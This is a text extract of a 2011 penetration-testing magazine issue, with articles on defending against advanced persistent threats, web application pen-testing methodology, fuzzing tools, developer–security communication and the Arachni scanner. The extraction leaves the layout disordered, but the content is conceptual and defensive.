machine he will often require access to a website bull Since these areas are often regarded as bdquosaferdquo
zones restrictions are lower and controls less strict
What Protective Measures Can Be DeployedApplication security has become major issue in the business world Whereas network security is fairly conventional and primarily leans on the filtering of destinations sources IP and Ports in most cases application security is more complex and involves applications that are often unique bespoke and
Anatomy of an APTAdvanced Persistent Threats are attacks calculated for latent effect and vested with a specific purpose that of retrieving sensitive or critical data
Several steps are necessary to reach the goal
bull The initial intrusionbull Continued presence within the IT systembull Bounce mechanism and in depth infiltrationbull Data extraction
HTTP plays an important role during the attacks firstly because it is predominantly present during the various stages and furthermore because it is often the only available protocol that can serve as an attack vector
The Initial IntrusionThe system is invaded by an attack focused on an area exposed to the public on the Internet In the case of Sony Playstation Network for instance the intrusion took place via their blog that used a vulnerable version of WordPress
These days it is unusual for any organization to do without a website and the latter can range from basic and simple to complex and dynamic
The website plays the role of a gateway that provides the initial point of entry into an infrastructure It becomes an outpost that enables important information to be gathered in order to successfully carry out the rest of the attack In addition depending on the application infrastructure location and lack of compartmentalization it is possible for a simple scarcely-used application to be found near or on the same server as a business application The attack will bounce from the one to the other and the business application which will then become accessible and provide more access privileges
Retrieval of information is often the vital issue during the bounce mechanism and and extended infiltration intothe system Some examples of the data targeted
bull User Passwords bull Hardware and network destinations -gt discoverybull Connectors to other systems -gt new protocolsbull Etc
Continued presenceAfter the initial inroads into the structure the next phase requires that presence within the system remains secure The machine has to be re-accessed and exploited without arousing the suspicions of system administrators
ADVANCED PERSISTENT THREATS
Page 8 httppentestmagcom012011 (1) November Page 9 httppentestmagcom012011 (1) November
deployed with many more specifications relating to infrastructureThree steps are necessary to prevent or respond properly to an APT
bull Preventionbull Responsebull Forensics
PreventionIdeally security should be addressed at the very beginning when software and even the application infrastructure are still at the conception stage It is necessary to follow certain rules which will condition the response to different threats
Define a Secure Application InfrastructurePartition the NetworkThis measure is one of the pillars of the PCI-DSS and for good reason Keeping sections separate can limit the impact of an intrusion making it more difficult to obtainsatisfaction because of the large number of bounces required to attain sensitive data Each zone also deploys a security policy adapted to its content whether the flow is inbound or outbound
Moreover partitioning allows for easier forensic analysis in case of a compromise It is easier to understand the steps and measure the impact and the depth of the attack when one is able to analyze each area separately Unfortunately there are many systems described as flat infrastructures that contain a variety of applications housed in the same area After an incident has occurred it is difficult to determine precisely which applications have been compromised and what data has been hijacked
Separation of ApplicationsApplications can be separated using criteria such as data categorization or the level of risk attached to the application Clustering provides numerous advantages
bull It promotes rationalization in the design of security policies which are more or less complex depending on the type of data and the structure of the application to secure
bull It enhances understanding of an attack and by doing so facilitates the search for evidence which will then be based on the criticality of data and complexity of applications
Anticipate Possible OutcomesTo better understand the scope of an attack it is necessary to anticipate the options available to a
hacker once an application has been compromised Once this is done it is necessary to anticipate the procedures required to analyze verify and understand the attack We should bear in mind that an area of the infrastructure in which it is impossible to install a monitoring tool will be very complex to analyze during an incident In such a case it is necessary to predefine the tools and procedures for investigations and or monitoring
Risk analysis and attack guidelinesThis step allows a precise understanding of risks based on the data manipulated by applications
It has to be carried out by studying web applications their operation and business logic
Once each data component has been identified it is possible to draw up a list of rules and regulations that need to be followed by the application infrastructure
Developer TrainingApplications are commonly developed following specific business imperatives and often with the added stress of meeting availability deadlines Developers do not place security high up on their list of priorities and it is often overlooked in the process
However there are several ways to significantly reduce risk
bull Raising developer awareness of application attacksbull OWASP TOP10bull WASC TC v2
bull The use of libraries to filter inputbull Libraries are available for all languages
bull Setting up audit functions logs and traceabilitybull Accurate analysis of how the application works
Regular Auditing Code analysisYou can resort to manual code analysis by an auditor or to automated analysis by using the tools available to find vulnerabilities in the source code of web applications These tools often require complex configuration This step is useful to detect vulnerabilities before going into production and thus to fix them before they are exploited
Unfortunately the practice is only possible if you have access to the source code of the application Closed source software packages cannot be analyzed
Scanning and penetration testingAll applications can be scanned and pentested They also require configuration and or a thorough analysis of the application to determine the credentials necessary
ADVANCED PERSISTENT THREATS
Page 8 httppentestmagcom012011 (1) November Page 9 httppentestmagcom012011 (1) November
for navigation or resources to be avoided because of their capacity to cause significant damage (eg links enabling the deletion of entries in the database)
These tests have to be reproduced as often as possible and whenever a change in the application is put in place by developers
Appropriate ResponseTraditional firewalls do not filter network application protocols at best the so-called next-generation model can recognize a type of protocol and filter content in the manner of an IPS by recognizing attack patterns This response is clearly inadequate
Each zone containing web applications has to be filtered on incoming and outgoing content and on the use of the protocol itself
This type of deployment is often called deep defense and has the ability to monitor the various attacks at both the application and network levels
Last but not least the association of the identity context with security policy allows better detection of anomalies
Traffic Filtering The WAF (Web Application Firewall)Web application firewalls can be considered as an extension of application network firewalls They are able to analyze HTTP and the content it conveys The device is strongly recommended by section 66 of PCI-DSS
Often used in reverse proxy mode it allows for a break in protocol and facilitates the restructuring of areas between applications
The WAFEC document (Web Application Firewall Evaluation Criteria) published by WASC is a useful guideline that helps to understand and evaluate different vendors as needed
The WAF also helps to monitor and alert in case of threat in order to trigger a rapid response (eg blocking the IP of the attacker via a dialogue protocol with network firewalls)
Traffic Filtering The WSF (Web Services Firewall)It represents an extension of the WAF on the protocols carrying XML traffic over HTTP such as SOAP or REST
XML and its standards make security management easier in the sense that the operation of the service is described by documents generated directly by the development framework (eg WSDL Schemas)
Web services are vulnerable to the same attacks as web applications they consequently need the same
kind of protection Their position in the application infrastructure however is much more critical They are often located at the heart of sensitive information zones and connected directly via private links to partner infrastructures
The WSF provides security on the message format and content but also on the use of a service The use or production of a web service entails contract between two parties on the type of use (eg number of messages per day data type etc) The WSF will also serve to monitor this function and to ensure respect of SLA between the two parties
Authentication AuthorizationApplications use identities to control access to various resources and functions
The association of the identity context and security increases efficiency in the detection of anomalies For example a whitelist adapted according to the type of user can verify access to information based on user role
Ensuring Continuity of ServiceApplication security is primarily related to the exploitation of vulnerabilities in order to divert normal use for malicious purposes
However some attacks based on weaknesses can be devastating in effect perpetrated to make the application unavailable and thereby provoke losses due to activity downtime
To retaliate it is necessary to establish protective measures that block denial of service and automated processes and to ensure load balancing and SSL acceleration
OperationMonitoringIt is important to understand the use of the application during production to monitor and detect abnormal behavior and make decisions accordingly
bull Blacklistbull Legal Actionbull Redirection to a honeypot
Log CorrelationUnderstanding abnormal behavior in an application helps in locating an attack
An application infrastructure can comprise hundreds of applications
To understand the attack as a whole and monitor changes (discovery aggression compromise) it is necessary to have holistic view
ADVANCED PERSISTENT THREATS
Page 10 httppentestmagcom012011 (1) November
To do this it is imperative to confront and correlate logs correlation to obtain real-time overall analysis and understand the threat mechanics
bull Mass Attack on a type of applicationbull Attack targeting a specific applicationbull Attacks focused on a type of data
Reporting and AlertingThe dialogue between application network and security teams is often complex within an organization Formalized reports on attacks and the use of the application provide a basis for work and an understanding of application threats for these teams
Alerts will enable them to react and trigger procedures either at the network level by blocking the IP of the attacker or at the application level by forbidding access to resources areas or more directly by referral to a honeypot in view of analyzing the behavior of the attacker
ForensicsUnderstanding the scope of an attackFor each area compromised it is important to understand what elements have been impacted and to trace the attack to the roots of the intrusion and compromise by the installation of a backdoor bounce mechanisms to other areas and or extraction of data
Analysis of application componentsTo understand how the intrusion occurred it is
important to look for abnormal uses One example could be the presence of anomalous data in a variable a cookie To drill down to this level the logs of the various application components turn out to be very useful
bull Web server or applicationbull Databasebull Directorybull Etc
Systems AnalysisTo understand how the attacker remained in the area it is important to identify the type of backdoor used From the simplest act such as the placing an executable file in the application itself to the injection of code into a process (eg hook network functions) it is necessary to analyze the system hosting the application
bull Changed configuration filesbull Users addedbull Security rules changed
bull Errors of execution or increase in privileges
bull Unknown daemons or unusual groups and users bull Etc
Analysis of network equipmentDuring the various bounces within the application infrastructure the discovery and exploration of new possibilities leaves fingerprints Network firewalls keep precious logs with traces of these attempts In addition if access is logged it is important to check if there are connections to web applications at unusual times
The End justifies the MeansIn conclusion we can see that the means used to achieve an APT are often substantial and proportional to the criticality of targeted data APT are not just temporary attacks but real and constant threats with latent effect that need to fought in the long run
The security of an application infrastructure begins with the conception process and requires basic rules to be respected to simply security operations
Real-life experience of application management highlights difficulties in implementing all the good practices
A comprehensive study of threats appropriate response and anticipation of possible incidents are now the recommended procedure in dealing with application attacks
MATTHIEU ESTRADEMatthieu Estrade has 14 years experience in internet security In 2001 Matthieu designed a pioneering application rewall based on Web Reverse Proxy Technology for the company Axiliance As a well known specialist in his eld he soon became a member of the Open Source Apache HTTP server development team His security expertise has been put to contribution in WASC (Web Application Security Consortium) projects like WAFEC and WASSEC Matthieu is also a member of the French OWASP chapter Matthieu is currently CTO at BeeWare
a d v e r t i s e m e n t
WEB APP SECURITY
Page 12 httppentestmagcom012011 (1) November
Dynamic web applications usually use technologies such as ASP ASPNet PHP Ajax JSP Perl Cold Fusion Flash and etc
These applications expose financial data customer information and other sensitive and confidential data that required authentication and authorization Ensuring that the web applications are secure is a critical mission that businesses have to go through to achieve the desired security level of such applications With the accessibility of such critical data to the public domain web application security testing also becomes paramount process for all the web applications that are exposed to the outside world
IntroductionPenetration testing (It is also called Pen Testing) is usually conducted by ethical hackers where the security team reviews application security vulnerabilities to discover potential security risks Such process requires a deep knowledge experience in a variety of different tools and a range of exploits that can achieve the required tasks
During the pen testing different web applicationsrsquo vulnerabilities are tested (eg Input Validation Buffer Overflow Cross Site Scripting URL Manipulation SQL Injection Cookie Modification Bypassing Authentication and Code Execution) A typical pen testing involves the following procedures
bull Identification of Ports ndash In this process ports are scanned and the associated services running are identified
bull Software Services Analyzed ndash In this process both automated and manual testing is conducted to discover weaknesses
bull Verification of Vulnerabilities ndash This process helps verify that the vulnerabilities are real where weakness might be exploited to help remediate the issues
bull Remediation of Vulnerabilities ndash In this process the vulnerabilities will be resolved and such vulnerabilities will be re-tested to ensure they have been addressed
Part of the initiative of securing the web applications is to include the security development lifecycle as part of the software development lifecycle where the number of security-related design and coding defects can be reduced and also the severity of any defects that do remain undetected can be reduced or eliminated Despite the fact that the above initiatives solve some of the security problems some of undiscovered defects will remain even in the most scrutinized web applications Until scanners can harness true artificial intelligence and put the anomalies into context or make normative judgments about them the struggle to find certain vulnerabilities will exist
WebApplication Security and Penetration Testing
In the recent years web applications have grown dramatically within many organizations and businesses where such entities became very independent on such technology as part of their businessesrsquo lifecycle
Automated Scanning vs Manual Penetration TestingA vulnerabilities assessment simply identifies and reports vulnerabilities whereas a pen testing attempts to exploit vulnerabilities to determine whether unauthorized access to other malicious activities is possible By performing a pen testing to simulate an attack itrsquos possible to evaluate whether an application has any potential vulnerabilities resulting from poor or improper system configuration hardware or software flaws or weaknesses in the perimeter defences protecting the application
With more than 75 of the attacks occurring over the HTTPS protocols and more than 90 of web applications containing some type of security vulnerability it is essential that organizations implement strong measures to secure their web applications Most of these attacks occur on the front door of the organization where the entire online community has an access to these doors (ie port 80 and port 443) With the complexity and the tremendous amount of sensitive data exist within web applications consumers not only expect but also demand security for this information
That said securing a web application goes far beyond testing the application using automated systems and tools or by using manual processes The security implementation begins in the conceptual phase where the modeling of the security risk is introduced by the application and the countermeasures that are required to be implemented It is imperative that the web application security should be thought of as another quality vector of every application that has to be considered through every step of the application lifecycle
Discovering web application vulnerabilities can be performed through different processes
bull Automation process ndash where scanning tools or static analysis tools will be used
bull Manual process ndash where penetration testing or code review will be used
Web application vulnerability types can be grouped into two categories
Technical VulnerabilitiesWhere such vulnerabilities can be examined through the following tests Cross-Site-Scripting Injection Flaws and Buffer Overflow Automated systems and tools which analyze and test the web applications are much better equipped to test for technical vulnerabilities than the manual penetration tests While automated testing and scanning tools may not be able
012011 (1) November
WEB APP SECURITY
Page 14 httppentestmagcom012011 (1) November Page 15 httppentestmagcom012011 (1) November
to address 100 of all the technical vulnerabilities there is no reason to believe that such tools will achieve such goal in the near future Current problems facing the web application tools are the following client-side generated URLs required JavaScript functions application logout transaction-based systems requiring specific user paths automated form submission one time passwords and Infinite web sites with random URL-based session IDs
Logical VulnerabilitiesWhere such vulnerabilities can manipulate the logic of the application to do tasks that were never intended to be done While both an automated scanning tool and skilled penetration tester can navigate through a web application only the latter is able to understand what the logic behind specific workflow or how the application works in general Understanding the logic and the flow of an application allows the manual pen testing to subvert or overthrow the business logic where security vulnerabilities can be exposed For instance an application might direct the user from point A to point B to Point C based on the logic flow implemented within the application where point B represents a security validation check A manual review of the application might show that it is possible for attackers to manipulate the web application to go directly from point A to point C and bypassing the security validation exists at point B
History has proven that software bugs defects and logical flaws are consistently the primary cause of commonly exploited application software vulnerabilities where it can lead to unauthorized access to the systems networks and application information It is also proven that most of the security breaches occur due to vulnerabilities within the web application layer (ie attacks using the HTTPHTTPS protocol) In such attacks traditional security mechanism such as firewalls and IDS provide little or no protection against attacks on the web applications
Security analyses review the critical components of a web-based portal e-commerce application or web services platform Part of the analyses work that can be done is to identify vulnerabilities inherent in the code of the web application itself regardless of the technology implemented back-end database or web server used by the application
Itrsquos imperative to point out that the web application penetration assessments should be designed based upon defined threat-model It should also be based upon the evaluation of the integration between components (eg third party components and in-house built components) and the overall deployment configuration that represents a solid choice for establishing a baseline security assessment Application penetration assessments server as a cost-effective mechanism to identify a set of vulnerabilities in a given application where it exposes the most likely exploit vulnerabilities
Figure 1 The different activities of the Pen Testing processes
WEB APP SECURITY
Page 14 httppentestmagcom012011 (1) November Page 15 httppentestmagcom012011 (1) November
and allow to find similar instances of vulnerabilities throughout the code
How Web Application Pen Testing WorksMost of the web applicationsrsquo penetration testing is carried out from security operations centers where the access to the resources under test will be remotely over the Internet using different penetration technologies At the end of such test the application penetration test provides a comprehensive security assessment for various types of applications (eg commercial enterprise web applications internally developed applications web-based portal and e-commerce application) Figure-1 describes some of the activities that usually happen during the pen testing process Some of the testing processes that are used to achieve the security vulnerabilities assessment such as Application Spidering Authentication Testing Session Management Testing Data Validation Testing Web Service Testing Ajax Testing Business Logic Testing Risk Assessment and Reporting
In conducting the web penetration testing different approaches can be used to achieve the security vulnerabilities assessment some of these approaches are
bull Zero-Knowledge Test (Black Box) ndash In such ap-proach the application security testing team will not have any of inside information about the target
environment and the expected knowledge gain will be based on information that can be found out in the public domain This type of test is designed to provide the most realistic penetration test possible since in many cases attackers start with no real knowledge of the target systems
bull Partial Knowledge Test (Gray Box) ndash In such ap-proach a partial gain of knowledge about the environment under testing will be achieved before conducting the test
bull Source Code Analysis (White Box) ndash In such ap-proach the penetration test team has fill information about the application and its source code In such test the security team will do a code review (line-by-line) in attempt to find any flaws that could allow attackers to take control of the application perform a denial of service attack against it or use such flaws to gain access to the internal network
Itrsquos also important to point out that penetration testing can be achieved through two different types of testing
bull External Penetration Testing bull Internal Penetration Testing
Both types of testing can be conducted with least information (black box) and also can be conducted with limited information (white box)
Figure 2 The different phases of the Pen Testing
WEB APP SECURITY
Page 16 httppentestmagcom012011 (1) November Page 17 httppentestmagcom012011 (1) November
Figure-3 shows different procedures and steps that can be used to conduct the penetration testing The following are the description of these steps
bull Scope and Plan ndash In this step the scope of the penetration testing is identified and the project plan and resources will be defined
bull System Scan and Probe ndash In this step the system scanning under the defined scope of the project will be conducted where the automated scanners will examine the open ports scanning the system to detect vulnerabilities and hostnames and IP addresses previously collected will be used at this stage
bull Creating of Attack Strategies ndash In this step the testers prioritize the systems and the attack methods will be used based on the type of the system and how critical these systems Also in this stage the penetration testing tools will be selected based on the vulnerabilities detected from the previous phase
bull Penetration Testing ndash In this step the exploitation of vulnerabilities using the automated tools will be conducted where the attacking methods designed in the previous phase will be used to conduct the following tests data amp service pilferage test buffer overflow privilege escalation and denial of services (if applicable)
bull Documentation ndash In this step all the vulnerabilities discovered during the test are documented evidence of exploitation and penetration testing findings are also recommended to be presented later within the final report
bull Improvement ndash The final step of the penetration testing is to provide the corrective actions on
closing the discovered vulnerabilities within the systems and the web applications
Web Applications Testing ToolsThrough the Pen testing a specific structure methodology has to be followed where the following steps might be used Enumeration Vulnerabilities Assessment and Exploitation Some of the tools that might be used within these steps are
bull Port Scannersbull Sniffersbull Proxy Serversbull Site Crawlersbull Manual Inspection
The output from the above tools will allow the security team to gather information about the environment such as Open ports Services Versions and Operating Systems The vulnerabilities assessment utilizes the data gathered in the previous step to uncover potential vulnerabilities in the web server(s) application server (s) database server (s) and any intermediary devices such as firewalls and load-balancers Itrsquos also important for the security team not to rely solely on the tools during the assessment phase to discover vulnerabilities manual inspection for items such as HTTP responses hidden fields and HTML page sources should be part of the security assessment as well
Some of the areas that can be covered during the vulnerabilities assessment are the following
bull Input validationbull Access Control
Figure 3 Testing techniques procedures and steps
WEB APP SECURITY
Page 16 httppentestmagcom012011 (1) November Page 17 httppentestmagcom012011 (1) November
bull Authentication and Session Management (Session ID flaws) Vulnerabilities
bull Cross Site Scripting (XSS) Vulnerabilities bull Buffer Overflowsbull Injection Flawsbull Error Handlingbull Insecure Storagebull Denial of Service (if required)bull Configuration Managementbull Business logic flawsbull SQL Injection faultsbull Cookie manipulation and poisingbull Privilege escalationbull Command injectionbull Client side and header manipulation bull Unintended information disclosure
During the assessment testing the above vulnerabilities is performed except those that could cause a Denial of Service conditions and usually discussed beforehand Possible options of Denial of Service testing include testing during a specific time testing a development system or manually verifying the condition that may be responsible for the vulnerability Once the vulnerabilities assessment is complete the final reports recommendations and comments are summarized and better solutions are suggested for the implementation process Once the above assessments are done the penetration test is half-way done and the most important part of the assessment has to be delivered which is the informative report thatrsquos highlights all the risks found during the penetration phase
The following are some of the commonly used tools for traditional penetration testing
Port ScannersSuch tools are used to gather information about which network services are available for connection on each target host The port scanning tools usually examines or questions each of the designated network ports or service on the target system Most of these tools are able to scan both TCP as well as UDP ports Another common feature of port scanners is their ability to examine the operating system type and its version number since protocol such as TCPIP implementation can vary in their specific responses The configuration flexibility in the port scanners serve examining the different port configuration as well as employ the ability to hide from the network intrusion detection mechanisms
Vulnerability ScannersWhile port scanners only produce an inventory of the types of available services the vulnerability scanners
attempt to exercise vulnerabilities on their targeted systems The main goal of the vulnerability scanners is to provide an essential means of meticulously examining each and every available network service on the targeted hosts These scanners work from a database of documented network service security defects and exercising each defect on each available service of the target hosts Most of the commercial and the open source scanners scan the operating system for known weaknesses and un-patched software as well as configuration problems such as user permission management defects or problem with file access controls Despite the fact that both network-based and host-based vulnerability scanners do little to help web application-level penetration test they are fundamental tools for any penetration testing Good examples for such tools are Internet Scanners QualysGuard or Core Impact
Application ScannersMost of the application scanners can observe the functional behaviour of an application and then attempt a sequence of common attacks against the application Popular commercial application scanners include Appscan and WebInspect
Web application Assessment ProxyAssessment proxies work by interposing themselves between the web browsers used by the testers and the target web server where data can be viewed and manipulated Such flexibility adds different tricks to exercise the applicationrsquos weaknesses and its associated components For example the penetration testers can view all cookies hidden HTML fields and other data used by the web application and attempt to manipulate their values to trick the application
The above penetration testing practice called a black box testing Some organizations use hybrid approaches where the traditional penetration testing along with some level of source code analysis of the web application is used Most of the penetration testing tools can perform the penetration testing practices however choosing the right tool for the job is something vital for the success of the penetration process and the accurate results
The following are some of the common features that should be implemented within the penetration testing tools
bull Visibility ndash The tool must provide the required visibility for the testing team that can be used as a feedback and reporting feature of the test results
bull Extensibility ndash The tool can be customized and it must provide scripting language or plug-in
WEB APP SECURITY
Page 18 httppentestmagcom012011 (1) November
capabilities that can be used to construct cust-omized the penetration testing
bull Configurability ndash Having the tool that can be configurable is highly recommended to ensure the flexibility of the implementation process
bull Documentation ndash The tool should provide the right documentation that can provide clear explanation for the probes performed during the penetration testing
bull License Flexibility ndash The tool that has the flexibility of use without specific constraints such as a particular IP range of numbers and license limits is a better tool than others
Security Techniques for Web Apps Some of the security techniques that can be implemented within the web application to eliminate vulnerabilities are
bull Sanitize the data coming from the browser ndash Any data that is sent by the browser can never be trusted (eg submitted form data uploaded files cookies data XML etc) If web developers fail to sanitize the incoming data from unwanted data it might lead to vulnerabilities such as SQL injection cross site scripting and other attacks against the web application
bull Validate data before form submission and manage sessions ndash To avoid Cross Site Request Forgery (CSRF) that can occur when a web application accepts form submission data without verifying if it came from a user web form It is imperative for the web application to verify that the user form is the one that the web application had produced and served
bull Configure the server in the best possible way ndash network administrators have to follow some guidelines for hardening the web servers Some of these guidelines are Maintain and update proper security patches kill all the redundant services and shutdown unnecessary ports confine access rights to folders and files employ SSH (Secure Shell network protocol) rather than using telnet or FTP and install efficient anti-malware software
In addition to the above guidelines it is always important to implement strong passwords for the web applications users and cleaning stored passwords
ConclusionA vulnerability assessment is the process of identifying prioritizing quantifying and ranking the vulnerabilities in a system where such process determines if there is
a weakness or vulnerabilities in the system subjected to the assessment Penetration testing includes all of the process in vulnerabilities assessment plus the exploitation of vulnerabilities found in the discovery phase
Unfortunately an all clear result from a penetration test doesnrsquot mean that an application has no problems Penetration tests can miss weakness such as session forging and brute-forcing detection and as such implementing security throughout an applicationrsquos lifecycle is imperative process for building secure web applications
As automated web application security tools have matured in the recent years and over time automated security assessment will continue to both reduce any uncertainty of determination (ie false positive results) and the potential to miss some issues (ie false negatives results)
Both automated and manual penetration testing can be used to discover critical security vulnerabilities in web applications Currently the automated tools canrsquot be entirely used as a replacement of the manual penetration test However if the automated tools are used correctly organizations can save a lot of money and time in finding broad range of technical security vulnerabilities in web applications The manual penetration testing can be used to augment the results of the logical vulnerabilities found as a result of using the automated testing
Finally it is important to point out that over time the manual testing for technical vulnerabilities will increase from difficult to impossible as web applications size and the scope of such applications and their complexity increase The fact that many enterprise organizations will not be able to dedicate the time money and the effort required to assess the thousands of web applications will increase the chances of using the automated tools rather than using the human factor to manually testing these applications Also relying on human efforts to test for thousands of technical vulnerabilities within these applications is subject to the human errors and simply canrsquot be trusted
BRYAN SOLIMANBryan Soliman is a Senior Solution Designer currently working with Ontario Provincial Government of Canada He has over twenty years of Information Technology experience with Bachelor degree in Engineering bachelor degree in Computer Science and Master degree in Computer Science
WHAT IS A GOOD FUZZING TOOLFuzz testing is the most efficient method for discovering both known and unknown vulnerabilities in software It is based on sending anomalous (invalid or unexpected) data to the test target - the same method that is used by hack-ers and security researchers when they look for weaknesses to exploit There are no false positives if the anomalous data causes abnormal reaction such as a crash in the target software then you have found a critical security flaw
In this article we will highlight the most important requirements in a fuzzing tool and also look at the most common mistakes people make with fuzzing
Documented test cases When a bug is found it needs to be documented for your internal developers or for vulnerability management towards third party developers When there are billions of test cases automated documentation is the only possi-ble solution
Remediation All found issues must be reproduced in order to fix them Network recording (PCAP) and automated reproduction packages help you in delivering the exact test setup to the develop-ers so that they can start developing a fix to the found issues
MOST COMMON MISTAKES IN FUZZINGNot maintaining proprietary test scripts Proprietary tests scripts are not rewritten even though the communication interfaces change or the fuzzing platform becomes outdated and unsupported
Ticking off the fuzzing check-box If the requirement for testers is to do fuzzing they almost always choose the quick and dirty solution This is almost always random fuzzing Test requirements should focus on coverage metrics to ensure that testing aims to find most flaws in software
Using hardware test beds Appliance based fuzzing tools become outdated really fast and the speed requirements for the hardware increases each year Software-based fuzzers are scalable in performance and can easily travel with you where testing is needed and are not locked to a physical test lab
Unprepared for cloud A fixed location for fuzz-testing makes it hard for people to collaborate and scale the tests Be prepared for virtual setups where you can easily copy the setup to your colleagues or upload it to cloud setups
PROPERTIES OF A GOOD FUZZING TOOLThere are abundance of fuzzing tools available How to distin-guish a good fuzzer what are the qualities that a fuzzing tool should have
Model-based test suites Random fuzzing will certainly give you some results but to really target the areas that are most at risk the test cases need to be based on actual protocol models This results in huge improvement in test coverage and reduction in test execu-tion time
Easy to use Most fuzzers are built for security experts but in QA you cannot expect that all testers understand what buffer overflows are Fuzzing tool must come with all the security know-how built-in so that testers only need the domain expertise from the target system to execute tests
Automated Creating fuzz test cases manually is a time-consuming and difficult task A good fuzzer will create test cases automatically Automation is also critical when integrating fuzzing into regression testing and bug reporting frameworks
Test coverage Better test coverage means more discovered vulnerabilities Fuzzer coverage must be measurable in two aspects specification coverage and anomaly coverage
Scalable Time is almost always an issue when it comes to testing User must also have control on the fuzzing parameters such as test coverage In QA you rarely have much time for testing and therefore need to run tests fast Sometimes you can use more time in testing and can select other test completion criteria
WEB APP SECURITY
Page 20 httppentestmagcom012011 (1) November Page 21 httppentestmagcom012011 (1) November
Application Security members are considered like the tax man asking for money Security is sometimes seen as a cost to pay in order to get
an application into Production Actually it is a little of everyones fault Since Security people and Developers usually do not talk the same language it is difficult for the two groups to work together and give each other the necessary attention and feedback that they deserve Letrsquos take a step back for a minute and let me clarify what I mean about language and communication Consider this scenario The Marketing department has asked for a brand new web portal that shows new products from the ACME corporation Marketers usually do not know anything about technology and they just want to hit the market with an aggressive campaign on the new product line Marketers might ask the developers something like Give us the latest Web 20 Social website enabled or something like that to impress the customers Plus they would like it as soon as possible and they provide a deadline that the developers must keep The developers brainstorm the idea write out some specifications and requirements start prototyping their ideas and eventually begin coding They are under pressure to meet the deadline and management usually presses even more to meet the proposed deadline Security slowly is pushed aside so that the coding and production can meet the deadline Most software architecture is not designed with security in mind and in project Gantt Charts there usually
are no security checkpoints included for code testing or allow time for security fixes or remediation
Developers are pushed to code the application so that they can meet the deadline Acceptance tests and functionality tests are passed and the application is almost ready for deployment when someone recalls something about security Hey we need to get this on-line So we need to open up firewall to allow access to it
The Security Application group asks for additional information about the application and request docu-mentation of how the application was built They do not see it from the developersrsquo point of view of meeting the deadline that Management has imposed on them
On the other side developers do not see the problem from a security perspective What risks to IT infrastructure will potentially be exposed if someone breaks into the new application
One solution to the problem is to execute a penetration tests on the application and look at the results Then security is happy since they can test the application and developers are happy once the penetration test report is complete Many times a Penetration Test report contains recommended mitigation steps that impose additional time restraints on the application delivery Reports usually contain just the symptom For example the report might have statements like a SQL injection is possible not the real root cause a parameter taken from a config file is not sanitized before utilization The report does not contain all
Developers are from Venus Application Security guys from
Mars
We know that Application Security people talk a different language than developers do whenever we publish a report make an assessment or when we review a software architecture from a security point of view There is a gap between developers and the Application Security group The two teams must interact with each other to reach the same goal of building secure code
WEB APP SECURITY
Page 20 httppentestmagcom012011 (1) November Page 21 httppentestmagcom012011 (1) November
but which is the right one to use to insure secure code development
NET has one single monolithic framework and Microsoft has invested money in security and it seems they did it the right way but it is not Open Source so professionals cannot contribute A generic framework based solution is not feasible What about APIrsquos Developers do know how to use APIrsquos and having security controls embedded into a single library can save the day when writing source code That is why OWASP introduced ESAPI project to provide a set of APIrsquos that developers can use to embed security controls into their code
The requested effort is minimal if compared to translate implement a filter policy into running code and you (as a security professional) now speak the same language as the developer This is a win-win approach The security team and the application developers are now on the same page and everyone is happy There is a third approach I will cover in a follow-up article It is the BDD approach BDD is the acronym for Behavior Driven Development which means that you start writing test cases (taking examples from the Ruby on Rails world you write most of time test beds using rspec and cucumber) modeling how the source code has to behave accordingly to the documentation or requirements specification Initially when you execute the test cases against your application there will probably be failures that need to be corrected The idea is straightforward Using the WAPT activity instead of a implement a filtering policy statement you will produce a set of rspeccucumber scenarios modeling how the source code can deal with malformed input Then the development team starts correcting the code until it passes all of the test cases and when testing is complete and all tests pass it will mean your source code has implemented a filtering policy How has development changed A new approach has been created to insure that the developers implement your remediation statement Now the developers understand how to handle malformed entry statements and why they are so important to the Application Security group
The next article we will see how to write some security tests using the BDD approach in order to help a generic Lava developer to deal with cross-site scripting vulnerabilities
of the information necessary to solve the problems at first glance The developers cannot mitigate all of the issues in time to meet the deadline so many times bug fixes are prolonged or pushed into the next revision of the software and in some cases they are never fixed Another problem is when the two groups talk to each other at the end of the whole process and they use a non-common-ground language that further confuses or annoys everyone and further pushes the groups further apart
Communications Breakdown You Give Me The ReportPenetration test reports are most of the times useless from the developers point of view because they do not give specific information where they can pinpoint where the problem is This is very ironic because the developers need to take full advantage of the security report since most of remediation is source code fixes
Security issues found in Penetration testing is not for the faint of heart There can be a lot of high-level security issues grouped by OWASP Top 10 (most of time) with some generic remediation steps such as implement an input filtering policy This information may not mean anything to a source code developer They want to know what module class or line where the problem exists so that they can fix it If provided enough time developers can eventually determine where the problem exists but usually they do not have the time to look through all of the code to find every testing error and still have time to get the application into production
Letrsquos Close the GapWhat we need to do is define a common ground where security can be integrated into source code somewhat painlessly Security should be transparent from the deve-lopment teamrsquos point of view This can be achieved by
bull Create a development framework that has security built into it
bull Design an API to be used by the application
Putting security into the framework is the Rails approach Railsrsquo developers added a security facility inside the frameworkrsquos helpers so developers inherit the secure input filtering SQL injection protection and CSRF protection token This is a huge step forward to assist developers with this problem This methodology works with a programming language that contains a secure framework for developing web application This is true for the Ruby community (other frameworks like Sinatra do have some security facilities as well) With the Java programming language community there are a lot of non-standardized frameworks available for Java developers
PAOLO PEREGOPaolo Perego is an application security specialist interested in xing the code he just broke with a web application penetration test Hersquos interested in code review and hersquos working on his own hybrid analysis tool called aurora He loves Ruby on Rails kernel hacking playing guitar and playing Tae kwon-do ITF martial art Hersquos an husband and a daddy and a startup wannabe You may want to check out Paolorsquos blog or looking at his about me page
WEB APP VULNERABILITIES
Page 22 httppentestmagcom012011 (1) November Page 23 httppentestmagcom012011 (1) November
Arachni is not a so-called inspection proxy such as the popular commercial but low-cost Burp Suite or the freeware Zed Attack Proxy of the Open
Web Application Security project (OWASP) These tools are really meant to be used by a skilled consultant doing manual investigations of the application
Arachni can be better compared with commercial online scanners which will be directed to the application and produce a report with no further interaction by the user
Every security consultant or hacker must understand the strengths and weaknesses of his or her toolset and to must choose the best combination of tools possible for the job at hand Is Arachni worthwhile
Time for an in-depth review
Under the HoodAccording to the documentation Arachni offers the following
bull Simplicity everything is simple and straight-forward from a userrsquos or component developerrsquos point of view
bull A stable efficient and high-performance framework Arachni allows custom modules reports and plug-ins Developers can easily use the advanced framework features without knowing the nitty gritty details
Pulling the Legs of ArachniArachni is a fire-and-forget or point-and-shoot web application vulnerability scanner developed in Ruby by Tasos ldquoZapotekrdquo Laskos It got quite a good score for the detection of Cross-Site-Scripting and SQL Injection issues on the recently publicised vulnerability scanner benchmark by Shay-Chen
Table 1 Overview of Audit and Reconnaissance modules included with Arachni
